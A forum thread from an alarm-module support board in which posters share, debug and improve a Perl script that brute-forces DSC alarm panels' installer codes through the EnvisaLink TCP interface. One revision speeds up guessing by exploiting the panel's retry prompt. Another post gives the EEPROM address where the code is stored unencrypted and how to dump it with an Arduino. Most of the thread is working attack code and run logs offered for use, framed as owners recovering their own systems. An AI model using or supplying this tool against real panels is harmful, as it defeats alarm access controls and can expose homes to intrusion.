EVL 4, DSC and lost installer code - hacking my own system

Information and support for EnvisaLink modules.

Moderators: EyezOnRich, GrandWizard

sacha
Posts: 2
Joined: Sun Dec 29, 2019 3:20 am

Re: EVL 4, DSC and lost installer code - hacking my own system

Postby sacha » Sun Dec 29, 2019 3:36 am

Hi,

I have been trying to use the code below but it keeps on failing following the authentication step. I have tried a several passwords but not luck. I was wondering if we need to use the DSC Master password or a password from our Envisalink portal. I am using the PC1616 model. I don't have my installer password since the company went bankrupt. We are looking for an alternative. From reading the reviews, this product sounds promising.

Thank you for your help.


Smith wrote:
mikep wrote:
From some googling I got the impression that clicks = Lockout is enabled, but people on the internet can often be confused.
Including, especially me! It was a very long time ago, so go with the internet majority. I don't recall which, I only remember DLS worked and I didn't need to reprogram the entire system...

Right 1616 has 6 zones plus one for each hardwired PK keypad (not sure about the other keypads).


Rightie O. Well, I'm testing blocks of 1000 installer codes now and then. It takes about 2.8 sec per attempt, so 45 min per block. Not sure yet if it will even work in the end but if it would work then it would be a nice feeling :mrgreen:

Here is the code I am using now in case anyone is curious, I guess about any linux system (including raspbian or mac) would have perl installed.

So far no keypad lockout despite 1000s of wrong attempts at getting into installer mode (it's a PC5015 board). I'll update here with either 'success' or 'fail'....

Code: Select all

#!/usr/bin/perl

use IO::Socket::INET;
use Time::HiRes qw ( time sleep );
 
# auto-flush on socket
$| = 1;

$socket = new IO::Socket::INET (
   PeerHost => '192.168.---------------------------------ADDRESS OF ENVISALINK---------------------------------',
   PeerPort => '4025',
   Proto => 'tcp',
);

die "cannot connect, $!\n" unless $socket;

print "connected\n";

DSC_get();

DSC_put(DSC_cmd("005", "---------------------------------PASSWORD---------------------------------"));    # 005 - network login

$response = DSC_get();

foreach ($response) {
   /^5000052A.*5051CB/s && print("correct pass\n");
   /^5000052A.*5050CA/s && print("wrong pass\n") && exit(1);
   /^.*5052CC/s && print("timeout\n") && exit(1);   
}

open OUT, ">log." . zulu() . ".txt";

$t = time;
l0gt();

for ($code = 5000; $code < 5999; $code++) {
   l0gt();
   $scode = sprintf("%04d", $code);
   l0g("$scode\n");
   DSC_put(DSC_cmd("071", "1*8"));      # 071 send keys, partition 1, '*8' enter installer mode
   DSC_get_ww("^922");            # 922 EVL requests installer code
   DSC_put(DSC_cmd("200", $scode));      # 200 send a code
   $r = DSC_get_ww("^6[58]");         # 6XX response
   l0g($r."\n");
   DSC_put(DSC_cmd("071", "1##"));      # 071 send keys, partition 1, '##' possibly back out of installer menu
   l0g(DSC_get_w()."\n");   
   sleep(0.6);                  # wait for messages to be processed, otherwise "Keybus Transmit Buffer Overrun"
   if ($r =~ /^680/) {l0g("success\n"); exit(0); }   
}

close OUT;
$socket->close();


sub l0gt {
   l0g("[" . sprintf("%.3f", time - $t) . "]\n");
}

sub l0g {
   my $s = shift;
   print $s; print OUT $s;
}

sub zulu {
   my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = gmtime(time);
   my $yyyymmddhhmmss = sprintf "%.4d%.2d%.2d_%.2d%.2d%.2dZ", $year+1900, $mon+1, $mday, $hour, $min, $sec;
   $yyyymmddhhmmss;
}


sub DSC_cs {
   my @chars = (split//, shift);
   my $cs = 0;
   foreach (@chars) { $cs += ord($_); }
   return sprintf("%.2X", $cs & 0xFF);
};

sub DSC_cmd {
   my $cmd = shift . shift;
   return $cmd.DSC_cs($cmd);
}

sub DSC_get {
   my $response = "";
   $socket->recv($response, 1024);
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   print "response: '$hresponse' (length " . length($response) .")\n";
   return $response;
}

sub DSC_get_w {      # wait for data
   my $response = "";
X: sleep(0.1);
   $socket->recv($response, 1024);
   if ($response eq "") { goto X; }
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   print "response: '$hresponse' (length " . length($response) .")\n";
   return $response;
}

sub DSC_get_ww {      # wait for specific data
   my $response = "";
   my $wanted = shift;
X: sleep(0.1);
   $socket->recv($response, 1024);
   if ($response eq "") { goto X; }
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   print "response: '$hresponse' (length " . length($response) .")\n";
   unless ($response =~ /$wanted/) { goto X; }
   return $response;
}

sub DSC_put {
   my $req = shift . "\r\n";
   my $size = $socket->send($req);
   my $hreq = $req; $hreq =~ s/\n/\\n/g; $hreq =~ s/\r/\\r/g;
   print "sent data '$hreq' (length $size)\n";
}


sacha
Posts: 2
Joined: Sun Dec 29, 2019 3:20 am

Re: EVL 4, DSC and lost installer code - hacking my own system

Postby sacha » Sun Dec 29, 2019 11:38 am

Disregard, found the issue. It is now working.

sacha wrote:Hi,

I have been trying to use the code below but it keeps on failing following the authentication step. I have tried a several passwords but not luck. I was wondering if we need to use the DSC Master password or a password from our Envisalink portal. I am using the PC1616 model. I don't have my installer password since the company went bankrupt. We are looking for an alternative. From reading the reviews, this product sounds promising.

Thank you for your help.


Smith wrote:
mikep wrote: Including, especially me! It was a very long time ago, so go with the internet majority. I don't recall which, I only remember DLS worked and I didn't need to reprogram the entire system...

Right 1616 has 6 zones plus one for each hardwired PK keypad (not sure about the other keypads).


Rightie O. Well, I'm testing blocks of 1000 installer codes now and then. It takes about 2.8 sec per attempt, so 45 min per block. Not sure yet if it will even work in the end but if it would work then it would be a nice feeling :mrgreen:

Here is the code I am using now in case anyone is curious, I guess about any linux system (including raspbian or mac) would have perl installed.

So far no keypad lockout despite 1000s of wrong attempts at getting into installer mode (it's a PC5015 board). I'll update here with either 'success' or 'fail'....

Code: Select all

#!/usr/bin/perl

use IO::Socket::INET;
use Time::HiRes qw ( time sleep );
 
# auto-flush on socket
$| = 1;

$socket = new IO::Socket::INET (
   PeerHost => '192.168.---------------------------------ADDRESS OF ENVISALINK---------------------------------',
   PeerPort => '4025',
   Proto => 'tcp',
);

die "cannot connect, $!\n" unless $socket;

print "connected\n";

DSC_get();

DSC_put(DSC_cmd("005", "---------------------------------PASSWORD---------------------------------"));    # 005 - network login

$response = DSC_get();

foreach ($response) {
   /^5000052A.*5051CB/s && print("correct pass\n");
   /^5000052A.*5050CA/s && print("wrong pass\n") && exit(1);
   /^.*5052CC/s && print("timeout\n") && exit(1);   
}

open OUT, ">log." . zulu() . ".txt";

$t = time;
l0gt();

for ($code = 5000; $code < 5999; $code++) {
   l0gt();
   $scode = sprintf("%04d", $code);
   l0g("$scode\n");
   DSC_put(DSC_cmd("071", "1*8"));      # 071 send keys, partition 1, '*8' enter installer mode
   DSC_get_ww("^922");            # 922 EVL requests installer code
   DSC_put(DSC_cmd("200", $scode));      # 200 send a code
   $r = DSC_get_ww("^6[58]");         # 6XX response
   l0g($r."\n");
   DSC_put(DSC_cmd("071", "1##"));      # 071 send keys, partition 1, '##' possibly back out of installer menu
   l0g(DSC_get_w()."\n");   
   sleep(0.6);                  # wait for messages to be processed, otherwise "Keybus Transmit Buffer Overrun"
   if ($r =~ /^680/) {l0g("success\n"); exit(0); }   
}

close OUT;
$socket->close();


sub l0gt {
   l0g("[" . sprintf("%.3f", time - $t) . "]\n");
}

sub l0g {
   my $s = shift;
   print $s; print OUT $s;
}

sub zulu {
   my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = gmtime(time);
   my $yyyymmddhhmmss = sprintf "%.4d%.2d%.2d_%.2d%.2d%.2dZ", $year+1900, $mon+1, $mday, $hour, $min, $sec;
   $yyyymmddhhmmss;
}


sub DSC_cs {
   my @chars = (split//, shift);
   my $cs = 0;
   foreach (@chars) { $cs += ord($_); }
   return sprintf("%.2X", $cs & 0xFF);
};

sub DSC_cmd {
   my $cmd = shift . shift;
   return $cmd.DSC_cs($cmd);
}

sub DSC_get {
   my $response = "";
   $socket->recv($response, 1024);
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   print "response: '$hresponse' (length " . length($response) .")\n";
   return $response;
}

sub DSC_get_w {      # wait for data
   my $response = "";
X: sleep(0.1);
   $socket->recv($response, 1024);
   if ($response eq "") { goto X; }
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   print "response: '$hresponse' (length " . length($response) .")\n";
   return $response;
}

sub DSC_get_ww {      # wait for specific data
   my $response = "";
   my $wanted = shift;
X: sleep(0.1);
   $socket->recv($response, 1024);
   if ($response eq "") { goto X; }
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   print "response: '$hresponse' (length " . length($response) .")\n";
   unless ($response =~ /$wanted/) { goto X; }
   return $response;
}

sub DSC_put {
   my $req = shift . "\r\n";
   my $size = $socket->send($req);
   my $hreq = $req; $hreq =~ s/\n/\\n/g; $hreq =~ s/\r/\\r/g;
   print "sent data '$hreq' (length $size)\n";
}


Simon
Posts: 3
Joined: Wed Jul 03, 2013 9:49 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Postby Simon » Thu Jan 02, 2020 8:09 pm

Sorry for being a Perl dunce. But can anyone help with this error?

Code: Select all

connected
response: '' (length 0)
send: Cannot determine peer address at ./alarm1.pl line 115.

edirol
Posts: 2
Joined: Fri Jun 12, 2020 6:01 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Postby edirol » Mon Jun 15, 2020 9:11 pm

Hi Smith,

Thanks for posting this code as it helped me recover my installer code after purchasing a home with an existing DSC system.

I've modified it a bit with:
- major: will retry code entry immediately if presented option
- minor: some more comments
- minor: more debug output
- minor: logs in localtime vs zulu

On my DSC system, it allows 2 attempts every 30s, so this code modification doubled the testing rate.

Thanks,
- Edirol

Here's the updated code:

Code: Select all

#!/usr/bin/perl

use IO::Socket::INET;
use Time::HiRes qw ( time sleep );

############################
# Edit the variables below #
############################

# This is the IP of your EnvisaLink
# eg. 192.168.0.X, 10.0.0.X, etc.
$ip = "---------------------------------ADDRESS OF ENVISALINK---------------------------------";

# This is your EnvisaLink password.  The default is user if you haven't changed it.
$password = "user";

# Range which you want to test
$code_start = "0000";
$code_end = "9999";

###############################################
# You shouldn't need to modify the code below #
###############################################

# auto-flush on socket
# force a flush after every write/print
$| = 1;

# Opens a new network socket on port 4025 (default port of EnvisaLink)
$socket = new IO::Socket::INET (
   PeerHost => $ip,
   PeerPort => '4025',
   Proto => 'tcp',
);

die "DEBUG: Cannot connect to EnvisaLink. REASON: $!\n" unless $socket;

# Start logging
# open OUT, ">log." . currenttime() . ".txt";
open(OUT, '>', "log." . currenttime() . ".txt") or die $!;

l0gt("DEBUG: Connected to EnvisaLink");

DSC_get();

DSC_put(DSC_cmd("005", $password));    # 005 - network login

$response = DSC_get();

foreach ($response) {
   /^5000052A.*5051CB/s && l0gt("DEBUG: Correct EnvisaLink password");
   /^5000052A.*5050CA/s && l0gt("DEBUG: Incorrect EnvisaLink password") && exit(1);
   /^.*5052CC/s && l0gt("DEBUG: Timeout") && exit(1);   
}

$t = time;

for ($code = $code_start; $code <= $code_end; $code++) {
   l0gt("DEBUG: Start installer mode entry cycle");
   DSC_put(DSC_cmd("071", "1*8"));      # 071 send keys, partition 1, '*8' enter installer mode
   DSC_get_ww("^922");            #  Wait for 922 (EVL requests installer code)
   $scode = sprintf("%04d", $code); # Pad code with leading 0s if <1000
   l0gt("DEBUG: Attempting $scode");
   DSC_put(DSC_cmd("200", $scode));      # 200 send a code

   # if the code is wrong you will get a 670 response and it will request another installer code via 922
   # on my system it will only let you try again once via a 922
   # 650=partition ready, 670=invalid access code, 680=system is in installer mode

   $r = DSC_get_ww("^922|^6[58]"); #look for retry or ready or installer mode code 

   # try again if given opportunity via 922
   while ($r =~ /^922/) {
      l0gt("DEBUG: Trying again within same cycle");
      $code++;
      $scode = sprintf("%04d", $code);
      l0gt("DEBUG: Attempting $scode");
      DSC_put(DSC_cmd("200", $scode));
      $r = DSC_get_ww("^922|^6[58]"); #look for retry or ready or installer mode code
   }

   l0gt("DEBUG: If we're in installer mode, back out to main menu");
   DSC_put(DSC_cmd("071", "1##"));      # 071 send keys, partition 1, '##' possibly back out of installer menu
   DSC_get_w();
   sleep(0.6);                  # wait for messages to be processed, otherwise "Keybus Transmit Buffer Overrun"
   if ($r =~ /^680/) {l0gt("SUCCESS: $scode is the installer code"); exit(0); }   
   l0gt("DEBUG: End installer mode entry cycle");
}

close OUT;
$socket->close();

# This will create a timestamp in localtime
sub l0gt {
   my $s = shift;
   my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
   l0g("[" . sprintf("%.4d%.2d%.2d_%.2d%.2d%.2d", $year+1900, $mon+1, $mday, $hour, $min, $sec) . "] $s");
}

# This prints to STDOUT as well as logfile
sub l0g {
   my $s = shift;
   print "$s\n";
   print OUT "$s\n";
}

sub currenttime {
   my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
   my $yyyymmddhhmmss = sprintf "%.4d%.2d%.2d_%.2d%.2d%.2d", $year+1900, $mon+1, $mday, $hour, $min, $sec;
   $yyyymmddhhmmss;
}

# Converts text to ASCII values
sub DSC_cs {
   my @chars = (split//, shift);
   my $cs = 0;
   foreach (@chars) { $cs += ord($_); }
   return sprintf("%.2X", $cs & 0xFF);
};

# Formats command
sub DSC_cmd {
   my $cmd = shift . shift;
   return $cmd.DSC_cs($cmd);
}

# Logs a response
sub DSC_get {
   my $response = "";
   $socket->recv($response, 1024);
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   l0gt("response: '$hresponse' (length " . length($response) .")");
   return $response;
}

# Waits for response(s) and logs it
sub DSC_get_w {      # wait for data
   my $response = "";
X: sleep(0.1);
   $socket->recv($response, 1024);
   if ($response eq "") { goto X; }
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   l0gt("response: '$hresponse' (length " . length($response) .")");
   return $response;
}

# Waits for a specific response and logs it
sub DSC_get_ww {      # wait for specific data
   my $response = "";
   my $wanted = shift;
X: sleep(0.1);
   $socket->recv($response, 1024);
   if ($response eq "") { goto X; }
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   l0gt("response: '$hresponse' (length " . length($response) .")");
   unless ($response =~ /$wanted/) { goto X; }
   return $response;
}

# Sends a command and logs it
sub DSC_put {
   my $req = shift . "\r\n";
   my $size = $socket->send($req);
   my $hreq = $req; $hreq =~ s/\n/\\n/g; $hreq =~ s/\r/\\r/g;
   l0gt("sent data '$hreq' (length $size)");
}


Smith wrote:
mikep wrote:
From some googling I got the impression that clicks = Lockout is enabled, but people on the internet can often be confused.
Including, especially me! It was a very long time ago, so go with the internet majority. I don't recall which, I only remember DLS worked and I didn't need to reprogram the entire system...

Right 1616 has 6 zones plus one for each hardwired PK keypad (not sure about the other keypads).


Rightie O. Well, I'm testing blocks of 1000 installer codes now and then. It takes about 2.8 sec per attempt, so 45 min per block. Not sure yet if it will even work in the end but if it would work then it would be a nice feeling :mrgreen:

Here is the code I am using now in case anyone is curious, I guess about any linux system (including raspbian or mac) would have perl installed.

So far no keypad lockout despite 1000s of wrong attempts at getting into installer mode (it's a PC5015 board). I'll update here with either 'success' or 'fail'....

randy.bodek.69
Posts: 1
Joined: Wed Jun 17, 2020 9:47 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Postby randy.bodek.69 » Wed Jun 17, 2020 10:08 pm

Hi, I came across this thread as part of my research today - I have a PC1864 that is installer locked (rapid clicks on power-up). I ended up using an Arduino and the dscKeybusInterface library to brute-force it. (pastebin)

I got a bit more interested and decided to dump the EEPROM - the installer code is held unencrypted in there at 0x5056 - 0x5058. There are three bytes, although only two are used for a four-digit code (I would assume the first one is used if six-digit is enabled - it defaults to 0x55). Examples:

0x55 0x55 0x55 = 5555 (default)
0x55 0x34 0x12 = 1234

You can read the EEPROM in-circuit with an Arduino and the i2c_read_eeprom sketch set to read 16kbytes. The SDA and SCL pins are available as pictured (the resistors are a little easier to solder to than the legs of the chip), and the reset point has to be connected to ground while you are reading, otherwise the DSC CPU will interfere.

https://imgur.com/a/B4iSC8Q

Wicky
Posts: 1
Joined: Fri Jun 19, 2020 12:00 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Postby Wicky » Fri Jun 19, 2020 12:17 pm

Hi Edirol,

Thanks for your code. I am trying yours now in my DSC 5010, Envisalink 4, Pi Raspbian. Two days now still running no luck. How do I know what is current progress from screen output? Is it working as it should be?

Post some of the screen output here:

[20200619_085258] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
[20200619_085604] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_085615] response: '61000229\r\n' (length 10)
[20200619_085615] response: '6501CC\r\n' (length 8)
[20200619_085707] response: '51110F8\r\n51080FE\r\n8490C18\r\n' (length 27)
[20200619_085707] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
[20200619_085739] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_085740] response: '61000229\r\n' (length 10)
[20200619_085741] response: '6501CC\r\n' (length 8)
[20200619_090044] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_090045] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_090057] response: '60900231\r\n' (length 10)
[20200619_090058] response: '6531CF\r\n' (length 8)
[20200619_090101] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_090116] response: '51110F8\r\n51080FE\r\n8490C18\r\n' (length 27)
[20200619_090117] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
[20200619_090328] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_090339] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_090526] response: '51110F8\r\n51080FE\r\n8490C18\r\n' (length 27)
[20200619_090526] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
[20200619_090935] response: '51110F8\r\n51080FE\r\n8490C18\r\n' (length 27)
[20200619_090935] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
[20200619_091157] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091158] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_091202] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091204] response: '61000229\r\n' (length 10)
[20200619_091205] response: '6501CC\r\n' (length 8)
[20200619_091206] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091216] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_091225] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091234] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_091240] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091243] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_091344] response: '51110F8\r\n51080FE\r\n8490C18\r\n' (length 27)
[20200619_091345] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
[20200619_091410] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091413] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_091430] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091439] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_091454] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091458] response: '61000229\r\n6501CC\r\n' (length 18)

Wicky

edirol wrote:Hi Smith,

Thanks for posting this code as it helped me recover my installer code after purchasing a home with an existing DSC system.

I've modified it a bit with:
- major: will retry code entry immediately if presented option
- minor: some more comments
- minor: more debug output
- minor: logs in localtime vs zulu

On my DSC system, it allows 2 attempts every 30s, so this code modification doubled the testing rate.

Thanks,
- Edirol

Here's the updated code:

Code: Select all

#!/usr/bin/perl

use IO::Socket::INET;
use Time::HiRes qw ( time sleep );

############################
# Edit the variables below #
############################

# This is the IP of your EnvisaLink
# eg. 192.168.0.X, 10.0.0.X, etc.
$ip = "---------------------------------ADDRESS OF ENVISALINK---------------------------------";

# This is your EnvisaLink password.  The default is user if you haven't changed it.
$password = "user";

# Range which you want to test
$code_start = "0000";
$code_end = "9999";

###############################################
# You shouldn't need to modify the code below #
###############################################

# auto-flush on socket
# force a flush after every write/print
$| = 1;

# Opens a new network socket on port 4025 (default port of EnvisaLink)
$socket = new IO::Socket::INET (
   PeerHost => $ip,
   PeerPort => '4025',
   Proto => 'tcp',
);

die "DEBUG: Cannot connect to EnvisaLink. REASON: $!\n" unless $socket;

# Start logging
# open OUT, ">log." . currenttime() . ".txt";
open(OUT, '>', "log." . currenttime() . ".txt") or die $!;

l0gt("DEBUG: Connected to EnvisaLink");

DSC_get();

DSC_put(DSC_cmd("005", $password));    # 005 - network login

$response = DSC_get();

foreach ($response) {
   /^5000052A.*5051CB/s && l0gt("DEBUG: Correct EnvisaLink password");
   /^5000052A.*5050CA/s && l0gt("DEBUG: Incorrect EnvisaLink password") && exit(1);
   /^.*5052CC/s && l0gt("DEBUG: Timeout") && exit(1);   
}

$t = time;

for ($code = $code_start; $code <= $code_end; $code++) {
   l0gt("DEBUG: Start installer mode entry cycle");
   DSC_put(DSC_cmd("071", "1*8"));      # 071 send keys, partition 1, '*8' enter installer mode
   DSC_get_ww("^922");            #  Wait for 922 (EVL requests installer code)
   $scode = sprintf("%04d", $code); # Pad code with leading 0s if <1000
   l0gt("DEBUG: Attempting $scode");
   DSC_put(DSC_cmd("200", $scode));      # 200 send a code

   # if the code is wrong you will get a 670 response and it will request another installer code via 922
   # on my system it will only let you try again once via a 922
   # 650=partition ready, 670=invalid access code, 680=system is in installer mode

   $r = DSC_get_ww("^922|^6[58]"); #look for retry or ready or installer mode code 

   # try again if given opportunity via 922
   while ($r =~ /^922/) {
      l0gt("DEBUG: Trying again within same cycle");
      $code++;
      $scode = sprintf("%04d", $code);
      l0gt("DEBUG: Attempting $scode");
      DSC_put(DSC_cmd("200", $scode));
      $r = DSC_get_ww("^922|^6[58]"); #look for retry or ready or installer mode code
   }

   l0gt("DEBUG: If we're in installer mode, back out to main menu");
   DSC_put(DSC_cmd("071", "1##"));      # 071 send keys, partition 1, '##' possibly back out of installer menu
   DSC_get_w();
   sleep(0.6);                  # wait for messages to be processed, otherwise "Keybus Transmit Buffer Overrun"
   if ($r =~ /^680/) {l0gt("SUCCESS: $scode is the installer code"); exit(0); }   
   l0gt("DEBUG: End installer mode entry cycle");
}

close OUT;
$socket->close();

# This will create a timestamp in localtime
sub l0gt {
   my $s = shift;
   my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
   l0g("[" . sprintf("%.4d%.2d%.2d_%.2d%.2d%.2d", $year+1900, $mon+1, $mday, $hour, $min, $sec) . "] $s");
}

# This prints to STDOUT as well as logfile
sub l0g {
   my $s = shift;
   print "$s\n";
   print OUT "$s\n";
}

sub currenttime {
   my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
   my $yyyymmddhhmmss = sprintf "%.4d%.2d%.2d_%.2d%.2d%.2d", $year+1900, $mon+1, $mday, $hour, $min, $sec;
   $yyyymmddhhmmss;
}

# Converts text to ASCII values
sub DSC_cs {
   my @chars = (split//, shift);
   my $cs = 0;
   foreach (@chars) { $cs += ord($_); }
   return sprintf("%.2X", $cs & 0xFF);
};

# Formats command
sub DSC_cmd {
   my $cmd = shift . shift;
   return $cmd.DSC_cs($cmd);
}

# Logs a response
sub DSC_get {
   my $response = "";
   $socket->recv($response, 1024);
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   l0gt("response: '$hresponse' (length " . length($response) .")");
   return $response;
}

# Waits for response(s) and logs it
sub DSC_get_w {      # wait for data
   my $response = "";
X: sleep(0.1);
   $socket->recv($response, 1024);
   if ($response eq "") { goto X; }
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   l0gt("response: '$hresponse' (length " . length($response) .")");
   return $response;
}

# Waits for a specific response and logs it
sub DSC_get_ww {      # wait for specific data
   my $response = "";
   my $wanted = shift;
X: sleep(0.1);
   $socket->recv($response, 1024);
   if ($response eq "") { goto X; }
   my $hresponse = $response; $hresponse =~ s/\n/\\n/g; $hresponse =~ s/\r/\\r/g;
   l0gt("response: '$hresponse' (length " . length($response) .")");
   unless ($response =~ /$wanted/) { goto X; }
   return $response;
}

# Sends a command and logs it
sub DSC_put {
   my $req = shift . "\r\n";
   my $size = $socket->send($req);
   my $hreq = $req; $hreq =~ s/\n/\\n/g; $hreq =~ s/\r/\\r/g;
   l0gt("sent data '$hreq' (length $size)");
}


Smith wrote:
mikep wrote: Including, especially me! It was a very long time ago, so go with the internet majority. I don't recall which, I only remember DLS worked and I didn't need to reprogram the entire system...

Right 1616 has 6 zones plus one for each hardwired PK keypad (not sure about the other keypads).


Rightie O. Well, I'm testing blocks of 1000 installer codes now and then. It takes about 2.8 sec per attempt, so 45 min per block. Not sure yet if it will even work in the end but if it would work then it would be a nice feeling :mrgreen:

Here is the code I am using now in case anyone is curious, I guess about any linux system (including raspbian or mac) would have perl installed.

So far no keypad lockout despite 1000s of wrong attempts at getting into installer mode (it's a PC5015 board). I'll update here with either 'success' or 'fail'....

edirol
Posts: 2
Joined: Fri Jun 12, 2020 6:01 pm

Re: EVL 4, DSC and lost installer code - hacking my own system

Postby edirol » Fri Jun 19, 2020 6:54 pm

Wicky,

Your log entry should look something like this as it cycles through the codes (Note: I have a DSC 1616). If you don't see the "attempting" line incrementing then your module is returning responses the code isn't expecting, so it'll keep waiting until it gets a predicted response.

Code: Select all

...
[20200619_185630] DEBUG: Correct EnvisaLink password
[20200619_185630] DEBUG: Start installer mode entry cycle
[20200619_185630] sent data '0711*82B\r\n' (length 10)
[20200619_185630] response: '5000712D\r\n' (length 10)
[20200619_185631] response: '51080FE\r\n' (length 9)
[20200619_185631] response: '9229D\r\n' (length 7)
[20200619_185631] DEBUG: Attempting 0000
[20200619_185631] sent data '200000052\r\n' (length 11)
[20200619_185631] response: '50020027\r\n' (length 10)
[20200619_185631] response: '6701CE\r\n' (length 8)
[20200619_185634] response: '9229D\r\n' (length 7)
[20200619_185634] DEBUG: Trying again within same cycle
[20200619_185634] DEBUG: Attempting 0001
[20200619_185634] sent data '200000153\r\n' (length 11)
[20200619_185634] response: '50020027\r\n' (length 10)
[20200619_185635] response: '6701CE\r\n' (length 8)
[20200619_185656] response: '51081FF\r\n' (length 9)
[20200619_185657] response: '6501CC\r\n' (length 8)
[20200619_185657] DEBUG: If we're in installer mode, back out to main menu
[20200619_185657] sent data '0711##0F\r\n' (length 10)
[20200619_185657] response: '5000712D\r\n' (length 10)
[20200619_185657] DEBUG: End installer mode entry cycle
[20200619_185657] DEBUG: Start installer mode entry cycle
...

Take a look at your log and see where it's stuck in a waiting loop. The DEBUG lines output at specific points in the loop.

Thanks,
- Edirol

Wicky wrote:Hi Edirol,

Thanks for your code. I am trying yours now in my DSC 5010, Envisalink 4, Pi Raspbian. Two days now still running no luck. How do I know what is current progress from screen output? Is it working as it should be?

Post some of the screen output here:

[20200619_085258] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
[20200619_085604] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_085615] response: '61000229\r\n' (length 10)
[20200619_085615] response: '6501CC\r\n' (length 8)
[20200619_085707] response: '51110F8\r\n51080FE\r\n8490C18\r\n' (length 27)
[20200619_085707] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
[20200619_085739] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_085740] response: '61000229\r\n' (length 10)
[20200619_085741] response: '6501CC\r\n' (length 8)
[20200619_090044] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_090045] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_090057] response: '60900231\r\n' (length 10)
[20200619_090058] response: '6531CF\r\n' (length 8)
[20200619_090101] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_090116] response: '51110F8\r\n51080FE\r\n8490C18\r\n' (length 27)
[20200619_090117] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
[20200619_090328] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_090339] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_090526] response: '51110F8\r\n51080FE\r\n8490C18\r\n' (length 27)
[20200619_090526] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
[20200619_090935] response: '51110F8\r\n51080FE\r\n8490C18\r\n' (length 27)
[20200619_090935] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
[20200619_091157] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091158] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_091202] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091204] response: '61000229\r\n' (length 10)
[20200619_091205] response: '6501CC\r\n' (length 8)
[20200619_091206] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091216] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_091225] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091234] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_091240] response: '60900231\r\n6531CF\r\n' (length 18)
[20200619_091243] response: '61000229\r\n6501CC\r\n' (length 18)
[20200619_091344] response: '51110F8\r\n51080FE\r\n8490C18\r\n' (length 27)
[20200619_091345] response: '8411CE\r\n51100F7\r\n5109100\r\n6501CC\r\n8401CD\r\n' (length 42)
